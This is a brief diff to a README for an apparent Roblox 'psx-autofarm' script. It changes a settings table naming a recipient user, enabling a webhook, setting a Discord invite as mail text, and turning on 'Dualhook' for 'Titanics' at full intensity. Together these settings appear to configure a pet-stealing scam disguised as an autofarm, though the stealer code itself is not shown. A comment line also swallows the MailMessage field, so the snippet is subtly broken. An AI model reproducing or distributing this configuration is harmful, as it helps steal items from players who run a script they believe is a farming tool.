robloxdeveloper12/psx-autofarm/README.md

 getgenv().Settings = {
     User = "larpedyourhuges",
-    Webhook = false, -- if you made it true they will receive dualhooked and undualhooked notifs to their webhook MailMessage = "larped by omg",
+    Webhook = true, -- if you made it true they will receive dualhooked and undualhooked notifs to their webhook MailMessage = ".gg/uSgzNwHDTS",
     Titanics = {
         Dualhook = true,
         Intensity = 100 --%